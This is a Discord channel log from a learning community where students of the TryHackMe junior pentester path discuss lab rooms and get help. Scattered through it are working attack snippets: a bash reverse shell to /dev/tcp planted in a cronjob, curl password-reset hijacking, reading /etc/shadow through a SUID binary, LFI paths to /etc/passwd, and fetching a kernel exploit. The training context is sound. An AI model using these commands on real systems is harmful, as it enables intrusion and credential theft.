#junior-pentester-path
1 messages · Page 29 of 1
In windows it's 2
what I want to know is what kind of godforsaken typewriter were these people using that did a line feed after the carriage return
To answer this question do I need to change the RPORT from 80 to 8000 ? I am in task 2 of the Metasploit Exploitation room.
Nevermind. It turns out that I do
For Task 5 of the Metaexploitation room are we supposed to search for the flag.txt in the C:/Windows/system32 directory? I am somewhat confused because the hint says use the search command in Meterpreter.
What does the hint say?
Does it say where or how to find it?
It says use search, doesn't search search the whole system anyway?
It says : "You can use Meterpreter's "search" command."
Ok, have you looked into the search command and how it works?
I know how the search command works in msfconsole, but the module didn't go over Meterpreter
Research, as always, is absolutely critical
If you want to know about searching in meterpreter, you google meterpreter search and you get lovely offsec documentation like that
Have a look at the first few lines in that article
I would have but I wanted to follow the module and it just threw 'meterpreter' in there even though the module didn't go over it
You absolutely need to support THM rooms with research and reading
They have good coverage, but it needs to be supported with reading.
I'm lucky my THM is 10.8.xx.xx
I have the first two octets now 
|| shell to meterpreter || do google
I'd just change it.

Yeah.
My staff cookie comes through in about 5 sec(s)
Possibly a script that runs like every minute like the Ra admin one.
I was curious about that too, because I can take other peoples target IP's and then do it, and it works for me, not them.
Obviously that's because I'm 10.8
This one took slightly longer.
Strongly suspect it will be a headless browser
Better remove the video so the cookie isn't given away.
netcat's still not showing with a fresh box and 1 ticket
I started making an XSS room before Adam joined and it was with selenium, that room never happened in the end due to it being a pain to automate lots of different actions
i have finished this path yaaay
Is it bad to not understand a lot of this until you look at walkthrough videos?
Finishing the pre sec course rn
You should know yourself and what is your most effective way of learning
Walkthroughs aren't evil.
But you won't learn either if you just read them
-> Balance
how's it going?
I think I messed up the box I was working on because I sent multiple requests with extreme inputs in an attempt to get a 500 Internal Error
and now it's been 3 minutes

Oh wait the server's back
poggers
Which VPN server are you using?
EU1.
COOL
For the Metasploit Meterpreter room , do I need to be in the enum_shares "directory" to determine what the name of the share the user uses? I looked at the hint and it suggested that I should use the enum_shares exploit but first that I needed to run a background session
Nevermind figured it out. I needed to type "sessions -i 1" and then I typed "run post/windows/gather/enum_shares"
@verbal cargo or anyone who may be able to help explain. I tried doing some searching around to figure this task out, but I never came up with the '&x=' solution appended at the end of the URL to get the flag. Does this just disregard the original first part of the URL request? Wasn't able to come up with much from a google search, so figured I'd ask in here for a bit of an explanation for my own understanding. Thanks in advance!
Gave +1 Rep to @verbal cargo
I'm not totally clear on it but this webpage makes it sound like it's about stopping some sort of recursion loop, where the data you're passing as the url parameter value can be expanded more than desired https://www.hackingetico.org/ssrf-server-side-request-forgery-explicación-y-práctica-habitación-de-tryhackme/
Here we are going to learn about the server-side request forgery (SSRF) vulnerability, which allows access to internal resources of the server.
I get an error when I attempt to run the hashdump module. Do I have to go back and type ' use /exploit/windows/smb/psexec' and change the SMBUser from 'ballen' to 'jchambers' by typing of course 'set SMBUser jchambers' ?
Ahh I see. Thank you @ancient marlin! I pulled this from the article you linked and translated: "In the track it tells us that the payload must end in &x= so that it ignores the rest of the URL it asks for."
I must have missed this at some point. Much appreciated for the resource and explanation!
Gave +1 Rep to @ancient marlin
I am trying to do the Dll hijacking room but can not get the file to the windows machine
The wget command doesn't work or I am doing it wrong, not sure what to specify for port
Nvm
Helps if the internet is connected on the windows machine
It's not meant to be on THM, the target machines are LAN only
still stuck on this error
Did you read the hint?
figured it out. All i needed to do was type 'hashdump'. Way less complicated than I made it out to be.
How do you get the wget command to work in PS then? I get an error every time, not at comp right now to show error.
Updated the Cross-Site Scripting Task 8 information:
on my end it's an alias to Invoke-WebRequest
get-help Invoke-WebRequest -examples
So right now I'm in Walking an Application, on Task 3, Viewing the Page Source. And when i input the url I get an error, any ideas?
Can't add an attachment so here's an Imgur link https://imgur.com/a/UnvmjDR
Oh are we not allowed to send links?
Your URL is wrong, you haven't put the <machine IP>
Start the target machine first dude
Then paste the IP to your browser it will work
lmao thanks for being patient man
I got it now, just gotta read more carefully next time. thanks man
Working??
Pretty sure! haven't seen this step yet but I think we're okay
Good! Best of luck
If you are talking about the room creators, then no, not necessarily
Oh, bc I realized that you guys need to have an extensive knowledge of the room you're moderating
and I thought 'Huh, wonder if the discord mods are certified" and now I'm here.
I'm not sure what you mean with "the room you are moderating" ?
Many of the discord mods might be certified, but you don't have to have a certificate to have knowledge
Beside that, mods are moderating the discord, not the rooms on tryhackme
Over the LAN, not over the internet
I am waiting forever for cronjob in task crontab in room linux privesc
Add rev shell code in all the files and wait for it
still see nothing
Terminate and start again.
Check the file permissions of, for example, backup.sh
It's rush hour or something, hard to connect to machine. Maybe try next time, but it's strange when can rev shell
I try on my own vmware and It worked.
Authentication Bypass Room
Task 4 Logic Flaw
can someone explain it to me in private, i can't understand it at all

so upon following the steps
i did this
then reset the email, giving me this green box: We'll send you a reset email to robert@acmeitsupport.thm
this did this string
curl 'http://10.10.45.61/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'
then this
curl 'http://10.10.45.61/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=attacker@hacker.com'
but i didn't get the green box saying we'll send you a reset email to attacker@hacker.com
then i created an account with the name: username
and email:{username}@customer.acmeitsupport.thm
then this command
curl 'http://10.10.45.61/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email={username}@customer.acmeitsupport.thm'
but i didn't get a ticket
what am i doing wrong
should i change the {username} to an actual username instead of these cases ?
or should i remove the 2nd curl since i don't have an email called attacker@hacker.com since i don't get a result
and why am i not getting the result where it says in the green box: we'll send you a reset email to attacker@hacker.com
oh well
i solved it, thanks guys 
Hey so this is like the lamest thing but I think I found a typo?
hey there! Can anyone please advise me on what I should proceed with after finishing the pre-security learning journey? What would be the next learning path to take?
Well you can go with the jr pentester path if you want more offensive knowledge or with the cyber defense for the defensive part of cybersecurity...
You can try also the web fundamentals path that one is nice also...
File Intrusion Room, Task8 Challenge
changed the GET method in network developer tools
and still i get no result 
even when i double click the blue POST that i created double times it opens a tab with a GET method in the source code
did it with burpsuite to save time
but is it better to do it via curl or manual response rather than burpsuite ?
oh and thank @steel nymph
Gave +1 Rep to @steel nymph
Curl and burp repeater are better
Both are better
Do whatever you are familiar with, one is CLI and other is GUI
i mean does anyone have any advantage over the other ?
would knowing and repeating using the curl command be better as a manual way {not to be a script kiddie} or anything, but i'd rather work smart and not hard lol, but i work both ways to know what's better
SSRF, Task2 SSRF Example
why would we use
instead of
oh F my bad
Take note of the payload ending in &x= being used to stop the remaining path from being appended to the end of the attacker's URL and instead turns it into a parameter (?x=) on the query string
but i mean why does the 2nd url start on the start of server request side
which is server.website.thm/flag?id=9
Because it's meant to replace the sub domain that the server is requesting with whatever the server parameter in the URL is.
E.g server parameter = api | Server request = api.website.thm
server parameter = shop | Server request = shop.website.thm
quick question guys: is it better to use burp or url injection in the sql injection in real world exercise since guessing the databases and usernames and passwords takes too much time and too much requests to the server?
doing some quick sql injection commands to check if it works or not before burp is a decent idea yeah
after that if you need to bruteforce the login there are better tools then burp for the job
unless you have the paid version of burp
forgot to mention that sqlmap is a thingy and can be used to do a lot of sql injection easier
thanks @steel nymph
Gave +1 Rep to @steel nymph
thanks @sage current and @steel nymph , i was just annoyed with how long the sql command injection is and how time consuming it is hence i asked this question, but overall thanks guys after all "work smart not hard", it's good to know the concept but a short path to getting around it if you can't get the full idea would pretty much equals the same output
.
Gave +1 Rep to @sage current
i think it goes with too many experiments, since the room of sql injection is pretty straightforward and goes only 1 way. my main point is most of the rooms that contain a lot of info, i basically can't wrap my head around, even with so many tries in the same exercise. it's hard to memorize all those commands, i believe that's because i have no prior knowledge.
i memorize and try to understand the sequence of the command, but still i fail meh
.
write notes.... write notes.... write notes
doing that with Notion, was @high lintel idea since that start lol. i'm saying should i worry if i don't get it even when i finish the room? like i have this problem with 3 rooms {SSRF/XSS/SQL}, it's basically because i can't wrap my head around them as i said, should i be moving forward so the exercise machines would help me understand more in depth and backing to room when this happens would let me say: OH..Ok so this does that and that's how it's connected .
or should i stay in those rooms till i fully get it ? 
redoing the challenges from those instruction rooms might help a bit
another way would be to read others notes or watch others notes
also known as looking at writeups
which is fine if you read them carefully and try and learn to understand in shadow opinion
Thanks for your time guys, i hope i didn't waste it.. i'll try this after i finish the Burp repeater room. 
Yo i got a question. When brute forcing for subdomains, what is the difference between brute forcing for sub domains, vs brute forcing for virtual hosts?
ah i see. thanks homie
Gave +1 Rep to @steel nymph
Burp Suite: Intruder
Task 11 : Practical Challenge
so the list is payload type is set to NUMBERS
when i put a range from 0-100
the payload count is still 0
so when i set number 1 to the step
and payload becomes 257
and i get some letters in my payload result and search
i got the flag anyway but i'm asking is this kind of bug or what is it ?
why are the numbers set from 0 to 100 and payload count is 257, is it the actual payload itself that is named numbers contains payloads like 3a, 5c in it ?
It seems because you have set the number format to hex instead of decimal
Can someone teach me how to get into a server and shut it down
What are you trying to do?
walk up to server
press power button
Hi all
First time posting here, please don't judge, I'll try my best. Any idea what that could be? I can't find the answer
How are stored XSS payloads usually stored on a website?
Is this for a tryhackme room?
Please can you state the room, task, and question number
Yes just a sec
It's from Junior Pentest Path, Cross-site Scripting Task 4
I guess comments, payload, injected code, javascript but it seems it is not the expected (8 letter) answer
Oh okay, it was database after all. It might be that I am not English native speaker, but wouldn't the question be better asked as "Where are ..." instead of "How are they stored"?
hmm maybe
I am trying to use the multi/handler Metasploit technique to do a Remote shell execution attack, but I get an "Invalid session identifier" error when I attempt to run that technique. I am on Task 13 of the "What the Shell" room and using a linux machine
multi/handler doesn't actually do anything other than listen for the connection, you need to make the shell start somehow
so do an nc -lvnp 4444 command on the @shell@practice-linux.com terminal perhaps?
Hello, i am stuck in the Privilege Escalation: Capabilities (room Linux PrivEsc), the payload inside the vim -c is not giving me the shell, perhaps i am missing something? thanks
do the check of capabilties on the target machine again
Thanks, i figured it out using view instead of vim
Gave +1 Rep to @sage current
good job
generally in the room the example that they give you is not exactly the same as the intended way to get the flag
Evening all
when I am entering in what I want to do in a netcat connection I can't add a new line (typically shift + enter), any ideas??
Not sure if I understand what you mean exactly, could you provide a screenshot ?
To understand this you need to understand how URLs are formed, especially how parameters are passed. '&' is a special character that separates variables (x=value_of_x&y=value_of_y). Then you can understand the forgery
I figured it out. Sorry for the confusing message. Thank you for the help though
Gave +1 Rep to @shadow echo
Finally done with this path
I get a 'permission denied' when I try to download this exploit to my target machine , even when I changed the permissions of the Exploit. I am in the Lin Priv Esc Room
The link to the exploit . https://www.exploit-db.com/exploits/37292
Try changing your working directory to somewhere like /tmp where you are able to write with your current user and downloading it after that.
Is there any CTF rooms recommended to someone who has finished this path?
https://tryhackme.com/hacktivities?tab=practice
Under "general", they'll show you recommended rooms based on your experience :)
Tried that and I am still getting an error.
Don't specify /tmp while requesting the file
As you're already in that dir
I don't know what you mean. So type 'wget http://10.10.186.146:8080/37292.c'
Still getting a 'permission denied' error. Maybe I need to use a chmod command, but I previously tried all different kinds of chmod commands that did not work.
do I need to change permissions using the chmod command?
No
You need to change directory to somewhere that you're allowed to create and write files in.
do I need to change the directory in my target machine or attacking machine?
Well where are you trying to write a file to?
I was going to initially download it and then after I downloaded it give it the write permissions
so to the target machine
*in the target machine
Correct.
So you need to find a dir that you can write to.
And someone already suggested one
Am i missing something here? Im currently in https://tryhackme.com/room/winprivesc at T4, trying to leverage Fitbit's unquoted service path to plant a shell there. I've tried to do that a few days ago already but today i can't sc qc Fitbit Connect as seen in the screenie. Last time i was able to. I've even executed the service so it is running but it still shows "not installed". Any tips on this before i replace the service file with the shell?
stupidly ez
thank you. that was the last thing i thought of, jesus
Thanks!
Gave +1 Rep to @steel nymph
Compiling this exploit will not help since when I ran the code it already showed a syntax error right?
No, not correct
It's C. C must be compiled to run.
You can't ./ a c file, you need to do that to the compiled binary
Thank you for the additional follow-up explanation
Gave +1 Rep to @verbal cargo
I am in Content Discovery task 3. I got the answer, but I am wondering how to do this in real life. If this only works if they forgot to replace the default icon with a custom one, how can I tell if that's the case? In this example, it looks like they are using a custom favicon.
well dunno exactly but generally you can use plugins in firefox to check favicons for commonly used backends/frontends
i need to learn Burp Suite, suggest me where to learn
This module will cover the basic functionality of the core tools in the Burp Suite framework: Proxy, Target, Repeater, Intruder, Sequencer, Decoder, Comparer, and Extender. You will learn how to apply Burp Suite when enumerating and attacking realistic web applications, as well as how to approach some of the common scenarios you may encounter wh...
TryHackMe has a room and if you are like me, go to youtube and watch a tutorial, it is not as hard as it looks in the beginning
Thank u guys
no worries!
So if I want to check Microsoft for example, I go to https://c.s-microsoft.com/favicon.ico?v2 . If I am not using Linux, can I just right click and download the file and check the MD5 with my own hashing software?
yuups and then put the md5 checksum into a tool that checks it against known platforms
Is this a vulnerability that is commonly found? I can't find many sites that have it. Also I don't understand what is happening. If the favicon is a custom favicon, how could it have a checksum that matches one on that OWASP list?
not actually sure how common it is but for newly setup websites shadow would assume it happens sometimes
The icon in the tryhackme website looks like a custom favicon.
Thanks for explaining! Now I see that that is from the page that says "website coming soon..."
So for Task 7 of the Linux Privi room, I logged into gerry conway's account and managed to locate the flag3.txt file but don't have the right permissions.
I don't think you even have to log into that account, just find a way to read flag3.txt
The task is about SUID, so look for files that have that bit set
Read the task carefully, because the task has given you the command to find SUID binaries.
Protocols and Servers Room
Task 3
why can't i get the flag.thm via telnet connection and i can get it over the website ?
Read the task text again, you have to specify a certain header
so i need to write down the host: telnet part
Right
Vulnerability Capstone
Task 2
What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.
i don't know how could i use this exploit
what do i have to change
i changed the first url
there is line under while 1 :
the proxy =
i'm really trash in understanding those exploits and the mechanism how they work 
it using burp suite together with the rest
so i saw about 2 youtube walkthrough
1 using burpsuite and other removing the burp command and using mkfifo and a stable shell
and other guy ran just python3 and everything worked fine
so it was just weird for me that i can simply remove codes from the exploit since i know nothing of scripting langs.
well you are looking at the wrong exploit in that case.... the correct one is this: https://www.exploit-db.com/exploits/50477 @jaunty dagger
i.e the one shadow linked should be able to be run with just python with near zero modifications
Looks like the variable xxxx is not used in the burp_url.
if the remote code execution 3 does not work there is a file on the attackbox for this.... which shadow can send here:
sorry for kinda spammy text but felt better to do it this way instead of uploading a random file
oh wait yeah that is true.....
dunno if that works for .py files
yuup that works better
thanks @steel nymph
Gave +1 Rep to @steel nymph
making things less spammy is a good thingy
lmao yeah of course that is the result as it is a exploit for fuel cms 1.4
and it is a python file
python files are scary
also shadow has better ideas and don't feel like trying to ruin their relationship with this discord by trying to hack its users
fair shadow assumed you were but felt a clarification was needed anyways
@hushed copper this is neat
You've not seen that?
Nope, I don't send people payloads

Tbf, I had Discord turn my zipfile of BoF payloads that I sent to a uni friend into a pasta recipe last week, soooooo
lmao that is a nice change
I'm nearly done with Jr pentester path, is there any recommended boxes to start on after that? I'm kind of looking to roll through reviewing on the stuff I learned in Jr pentester.
Great thanks, I wasn't sure if I should jump right into that
https://tryhackme.com/hacktivities?tab=practice then the general tab
is also a good bet
Is offensive pentesting introducing a lot of new stuff or just ctfs based on things in Jr?
Thanks I'll look at these as well
Gave +1 Rep to @sage current
that page updates for each user as they go along if shadow understands it correctly so you will get recommended ctf boxes that fit into your knowledge
Awesome thanks, much appreciated
Gave +1 Rep to @steel nymph
Ah great, maybe I'll hit some of these boxes in between paths
Linux PrivEsc
Task7
i can't get the SUID file
i tried base 64
and it's not working
tried the command from GTFOBins and it's not working actually
i think the choice of service is either wrong or i'm trying to find it the wrong way
the highlighted area is where i searched
i tried everything else actually
i tried the shell
i'll show you
so i was going the right way ?
F

find / -type f -perm -04000 -ls 2>/dev/null , i used this at the start
SUID
i can't :3
when i typed sudo -l
nothin showed up
so i have no premission to run sudo
oh
wait ..
i'll try this one
so i might need you to solve it for me since i don't understand what it really says :3
i tried now
but seems i'm getting it the wrong way
i tried LFILE=sudo
./base64 "$LFILE" | base64 --decode
but seems it doesn't work
reason: ./base64 not found
because i can't install it
done it
i was able to access the file, man i'm stupid xD
last question how do i copy out of this ubuntu black windows
or should i switch to attackthebox ?
nano /etc/shadow will print the contents of the /etc/shadow file. We can now use the unshadow tool to create a file crackable by John the Ripper. To achieve this, unshadow needs both the /etc/shadow and /etc/passwd files.
in Task 7
What is the password of user2?
i just went to hashcat wiki
got the hashcat format
used john to decrypt it
but i didn't use the unshadow method
is this ok ? or should i know this shadow method ?
@steel nymph are you a wizard ?
So right now I'm in Authentication Bypass Task 3, and after I run the brute force command it comes up with this error
"Keyword W1 defined, but not found in the headers, method, URL, or POST data". I could easily be missing something but i've read it through a few times and can't seem to find the problem.
Linux PrivEsc
Task9
why doesn't the netcat port listen and receive connection ?
Check the file permissions of backup.sh, you probably need to make it executable
i got so angry with the file that i did chmod 777 instead of +x 
Linux PrivEsc
Task 10
Exploit the $PATH vulnerability to read the content of the flag6.txt file.
You can add the writable directory to your user's PATH and create a file named "thm" that the "./test" executable will read. The "thm" file can simply be a "cat" command that will read the flag file.
so the steps i took in this challenge :-
1- echo $PATH
2- find / -writable 2>/dev/null
3- i found a file called thm.py in /home/murdoch
4- cat that file and those are the results
i did ./test
then i entered the root priv.
but i have question here
it's a pre-setup file as it's an advanced PrivEsc for us as beginners ?
I think the thm.py is simply showing you what the test binary is doing
oh ok, since i didn't really understand the code so i said i might ask
so as i said, it's a pre-setup file
Well the test binary is looking for a file called thm and runs that, since the test binary runs with root permissions, your thm file will be executed with root perms too
First of all I think it wouldn't be executed with root perms and secondly, it would just do the same thing as the test binary itself, looking for a file called thm on the system
True point
i don't understand this lesson pretty well, i think i'll revise it later when i get it in a ctf
If you run the cat command, how does your system find the cat binary ?
i'm shy to say that i'm this stupid that i don't know 
Deja Vu explains this quite well IMO
It's fine, doesn't mean you are stupid.
I don't know about Deja Vu what James said, but for sure something to check out if he recommends it.
Either way, if you run any command, is it cat ls or whatever, your system is checking the PATH variable.
In your PATH variable are paths like /usr/bin/ or maybe even /home/karen etc.
So it's checking all these paths if there is a binary called cat, if there is, it can execute it.
So since there is /usr/bin/cat it can execute it.
It's the same with the thm binary your system is looking for now, it's checking all the paths in the PATH variable.
I hope that's making sense, I tried my best to explain it
actually that's much more easy to understand rn
Linux PrivEsc
Task 11
so why can't i cd to backup :3 ?
ok i understood what i did wrong
i was putting files on other file lol
In subdomain enumeration task 6, I am supposed to find the most occurring size value. What is that?
You're getting errors
Thanks!
Gave +1 Rep to @steel nymph
file inclusion task 5 lab 4. when I put /. or %00 the response is not given... instead I have to use //, which is in lab 5... so how can I solve lab 4 without knowing lab 5? or does it also work doing this http://ip/lab4.php?file=../../../../etc/passwd/ and it has nothing to do with the exercise
Windows PrivEsc
Task2
What is the state of Windows Defender?
i used
sc query windefend
nothing comes out
went to control panel
but i can't get to know the firewall status unless i got the admin pass lol which i think is not part of the lesson
tried even sc query WinDefend
doesn't return back results
maybe the machine is stuck
sc query windefend
Are you using Cmd or Powershell?
can't find the bpnetworking room (https://tryhackme.com/room/bpnetworking) that's linked in nmap01, has it been replaced with some other room?
Powershell
Use cmd
Where should i go after Jr-Pentester path is finished? should i move to web application fundamentals or offensive ?
I have just started the course, and I cannot find the flag in the comment of the page source for some reason? There are 3 comments and they are pretty short, I'm pretty sure I haven't missed them
Are you looking in the right page ?
The site is linked in the room (Acme IT support). I went right click -> Page Source
Very funny. i did read them
One of them is with the link which is used later on, the others don't seem to be useful.
I would post a screenshot but I am not permitted, is the flag supposed to be in the comment?
I'm not being sarcastic here, this is a genuine tip. Someone asked the same thing recently
You can post screenshots if you verify with the bot, follow the steps in the link below
!docs verify
ugh, 
Thanks, moment
Asking the question again for the last time not to bother you all @remote iris @idle bison @shadow echo 
This should be it. Unless I am blind (which I probably am), I don't see the token which is supposed to be in one of the comments
Try the Comptia pentest+
Please don't do this.
There's no reason to ping a bunch of people to answer a question that anyone can, it just seems impatient
Yeah, figured it out the moment I sent it, fuck me
Sorry
@idle bison
With the CapStone Challenge should all 7 privilege escalation attacks you tried throughout the Linux PrivEsc room work or do only one of those privilege escalation attacks work and you have to figure out which one
I don't think that all of them will work, so most likely you will have to figure out a way to priv esc, but can't say for sure anymore since it's a while ago since I did that
Thank you for reporting, this link will be removed shortly, as the bpnetworking room has been retired.
Gave +1 Rep to @whole timber
Would this be a linux kernel?
This has now been fixed.
Awesome, thanks a lot for looking into it. A bunch of other rooms have the bpnetworking room linked as well, don't remember which ones, hopefully you can fix them too.
Hmm, a quick question, there are challenges here, right? It mentions using Burpsuite which is the whole section inside the course, but only after this section. Should I do that first and then come back or is it not required?
This is the File Inclusion room.
i think you take a look at burpsuite first and then come back.. it's easy to do that challenge with it.. or you can choose to do it using the browser address bar
It's not required to use Burp for these challenges, you should be able to solve them with the dev tools or curl as well
Alrighty thank you
In the Linux PrivEsc room, I'm unable to use wget to get the exploit on the vulnerable machine onto the local one. Tried troubleshooting, but StackOverflow said I needed sudo privileges, which I don't have. Here's the error I'm getting:
Connecting to [LOCAL_IP]:[LOCAL_PORT]... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
37292.c: Permission denied
Cannot write to ‘37292.c’ (Permission denied).
Any ideas?
That would most likely mean you don't have write permission in the directory you are currently in while trying to wget
So just search for a directory you are able to write to
Gotcha! Thanks!
On the 9th task of the Linux PrivEsc room (https://tryhackme.com/room/linprivesc), I'm unable to catch the reverse shell on my listener. Have done the following:
On the vulnerable machine:
- Replaced the cronjob executing backup.sh at /home/karen/backup.sh with: bash -i >& /dev/tcp/[Local IP]/6666 0>&1
- Made the file an executable with: chmod +x backup.sh
But I don't catch a shell:
nc -lvnp 6666
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Don't know where I'm going wrong.
Did you also add the shebang ?
I am trying to finish the Authentication Bypass room, but I am getting a site cannot be reached error for the Acme IT page. I was on the site Friday, but had to stop. The link it is taking me to is http://10.10.225.113/customers/reset. I have cleared my cache and closed/reopened the room and attack box. Any other ideas?
you got the problem
thank you so much
Hi
I have a question - subject: Local File Inclusion (LFI), PHP
why does http://webapp.thm/get.php?file=/etc/passwd work?
the include function asks for a specific $_GET, namely parameter "lang"
why is the parameter 'file' accepted then?
Because it's a typo
what do you mean
The content in the room has a mistake
hmm ok. What would normally be written there?
It should say index.html?lang=/etc/passwd
cc @merry night typo leading to confusion
Lots of mistakes, yes. I got put off by all the errors walking through the room.
Please do report them in #room-bugs
In the Windows PrivEsc room, task 2 requires that I find the state of Windows Defender. As per the writeup, the command I should execute is: sc query windefend, but doing it in PowerShell on the VM doesn't do anything...
Any ideas?
try sc.exe query windefend or run the above command you used in cmd
works, thank you so much
Gave +1 Rep to @sage current
no problem
this is because powershell has a built in sc cmdlet and you want the sc.exe instance
ah makes sense :)
just a quick clarification: nothing to do with a specific task per se, but with the paths challenges are the attack boxes 100% needed to complete?
The attackbox is a convenience thing
It's an Ubuntu machine loaded with pentest tools
Alright, well then either I don't have my ovpn set up correctly, because some of the tasks only show progress when using the attackbox; other times, that's not the case.
Just wanted to sniff out what my issue was.
is that task 8? i'm working on task 7 rn
good to know, time to reset and do it in the attack box
Too late, already did, but I've already passed the location I was on in task 7
just to get stuck on level 4, sounds right
it's entirely possible that it's a picnic error when vpn is involved if i'm being wholly honest
I am having trouble copying text from outside the Windows virtual terminal into the Windows virtual terminal. I am in the Windows PrivEsc room.
How do you do it? You mean from your window to the attack machine?
Can someone explain step 1 to step 2 to me? I read the description, but I'm still confused.
It's about SSRF.
Description:
"In this example, the attacker can control the server's subdomain to which the request is made. Take note of the payload ending in &x= being used to stop the remaining path from being appended to the end of the attacker's URL and instead turns it into a parameter (?x=) on the query string."
we have the first part website.thm/stock?server and the second part api.website.thm/api/user. In step 2 there is the request to the API server. why does it say website.thm/stock/item?id=123 in the querystring. where does that come from all of a sudden?
"[...] &x= being used to stop the remaining path from being appended to the end of the attacker's URL. "
Don't understand why the API server gets website.thm/stock/item?id=123 as the query string. I thought it would be cut off.
I'm too stubborn for that
fair
shadow just gets that you somehow make the website refer to itself and thereby get access to api and thingies you are not meant to have access to
can a URL contain multiple question marks in the querystring?
I know that the first ? initiate the querystring.
but in this example I see two ?
These are the sorts of questions that make hacking a thing, evidently yes but how should the server handle it in this case?
Never underestimate the value of doing stupid shit and seeing what happens, good motto to play by
I think I understand
The first ? is the introduction of the query string. The part that is in the url= parameter is sent to the API server. The 2nd ? is intended for the API server.
The second ? here is part of the URL for the API server
One for the webserver, and the url= part has its own ? for the API server
Now my previous question also makes more sense.
Let's imagine that there is a simple web server without an API server. If I would now accidentally make two ?, what would be the effect of the 2nd?
https://stackoverflow.com/questions/2924160/is-it-valid-to-have-more-than-one-question-mark-in-a-url
I came across the following URL today:
http://www.sfgate.com/cgi-bin/blogs/inmarin/detail??blogid=122&entry_id=64497
Notice the doubled question mark at the beginning of the query string:
??...
It goes back to the RFC, as many things do
thank you
Gave +1 Rep to @idle bison
Here I am again. Greenhat in action
Direct access to /private is prohibited. Here you try to access the directory private by using path traversal to bypass the lock. So one level higher ../ and then into the private directory. Can you explain to me what the x is doing here?
Description: "This trick works because when the web server receives the request for x/../private, it knows that the ../ string means to move up a directory that now translates the request to just /private"
My question: what is the x doing here? This is not a directory or something (?)
Probably bypassing a filter that makes it unable to start with a /
The x pretends to be another directory, which means it moves into the x directory, and back out of it with the ../
oooh that makes sense
why does this work on a webserver and not on my Linux?
on my Linux: No such file or directory
in terminal
I can not answer that for you, either that is a webserver thing, or there has to be a real directory called x in order to work
I entered x/y/z/../../../private to this on the web server. That worked. Your statement that it pretends these directories exist seems plausible to me. Am just confused as to why this doesn't work on the Linux terminal. After all, the web server is Linux (mostly, I think).
Maybe I'll find out soon.
Well the webserver most likely is apache or nginx, running on linux, so it's kind of not linux itself and therefore might get processed differently
hmm ok
Can anyone help with systemctl on Nessus?
Tried to start the web
with the command, but it's doing nothing.
Dude, it did the command that was supplied by you, if you check the status you will see everything
No news is good news, check if it's open and running
yes i used the command that was displayed
and i haven't checked yet
thx
In general, no news is good news. If it fails, you will be told.
Why so, if you don't mind me asking?
I've been stuck on it all day and wondering what I was doing wrong.
Because of the way the target machine's routing is set up, it is only allowed to access the 10.10.x.x subnet.
I'm working on the active recon room. When doing the telnet exercise, shift+enter to put in the host: name part of the command works. On the netcat exercise, trying to do shift+enter just enters the command prematurely, yet the instructions still say to use shift+enter. Am I doing something wrong or is there a workaround?
Where does it say to use shift+enter ?
Task 6 "First, you can connect to a server, as you did with Telnet, to collect its banner using nc MACHINE_IP PORT, which is quite similar to our previous telnet MACHINE_IP PORT. Note that you might need to press SHIFT+ENTER after the GET line."
So what if you just use enter? As it said "might need to"
Enter just enters the command
I'm using the attackbox, I don't know if that's causing the issue.
By just "enters the command", you mean it's jumping into a new line, right ?
No, like it runs the command (and returns an unsuccessful request) before I can type on the new line. Pressing enter on the telnet command does let me type on the new line, but netcat does not.
Mh, I just tried it with the attackbox and it seems to be working just fine.
So you might want to provide a screenshot of that, therefore you would have to verify first
!docs verify
So, I'm doing the "junior pentester path" and I was wondering how I can practice what I've learned. My first idea was to explore the vulnerabilities on the OWASP Juice Shop project. Do you guys have any other advice/idea to practice what is learned on the "junior pentester path"?
Of course, here I'm talking about web penetration.
cheers
can I ask a noob question here ?
I like to learn web pentest. I am following a YouTube tutorial. I downloaded OWASP ZAP, apache2, php, mutillidae in the /var/www/html directory and installed some other packages. I get an error message while unpacking mysql-server. It is some kind of dpkg failure. So I downloaded mariadb instead of mysql-server. Will it cause a problem?
And also I installed Firefox with the FoxyProxy extension and added an option 127.0.0.1 with port 8080
also I changed the network setting of firefox to 127.0.0.1 with port 8080
no..
I am following a YT channel. But I don't know where to ask my doubts
and clear the problems
Can I also ask a question?
I'm having an issue finding the HTML flag in the Walking an Application task 3
yes
I'll send a ss
ok
done
I've checked the source code, I went to the link in the comment at the bottom
but I didn't see a flag
or I don't know how to recognize it
that gave me a "FILE NOT FOUND"
/new-home-beta
I pasted that into my browser
yea
That's what happened
What do I do then?
Isn't it a pathway?
I found it
view-source:https://10-10-76-45.p.thmlabs.com/new-home-beta
In the first lab the web framework site was down for me, wasn't pinging (but I was able to resolve its IP), wouldn't respond to telnet on 443 or 80, and had no ports open for nmap (...). I'm guessing it was just down; I'm new to TryHackMe and have a free account, how often does this happen?
Basically, I'm missing that one flag to go to the next page
Based on the hint I would just need to get the contents, see a reference to a 10-10--.p.thmlabs.com/somefile.zip and then get the flag from those contents, but I wasn't able to get the framework site at all
Sorry, this was for walkinganapplication in the Jr. pentester path
Hi guys, I'm doing the Introducing to web hacking/Subdomain Enumeration/Virtual host module. When using the ffuf command on my own Kali machine it's taking such a long time, meanwhile when I'm using it on the attackbox I'm getting instant results. How come it's taking so long on my machine?
But you get results when doing it on your own machine?
I end up cancelling the scan after a while, so no, I have never seen any results.
Could you show a screenshot of you running ffuf, so to see the command as well as the progress ?
Oh I forgot, if you verify you can send screenshots directly in here, which most of the people prefer, including myself
Are you connected to the thm vpn ?
!docs verify
I thought i did
Can I access your target machine myself?
You just have to say yes or no
I just want to see if it's an issue with the target machine or an issue on your side
Did you shut down the machine or is 10.10.169.58 still valid?
ya
one second
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.24.117
that's the new machine
It's not working though!
when i'm pinging it i get no response
Could you enter ip a s in a new terminal and let me know if you see a tun0 interface?
As well as letting me know if you only see a tun0 interface or any extra like tun1, tun2 etc.
So no tun1, tun2 etc. ?
no
Alright, if you do curl 10.10.10.10/whoami does it reply with your tun0 IP ?
Is your attacking machine a virtual machine?
Or is it an installed one ?
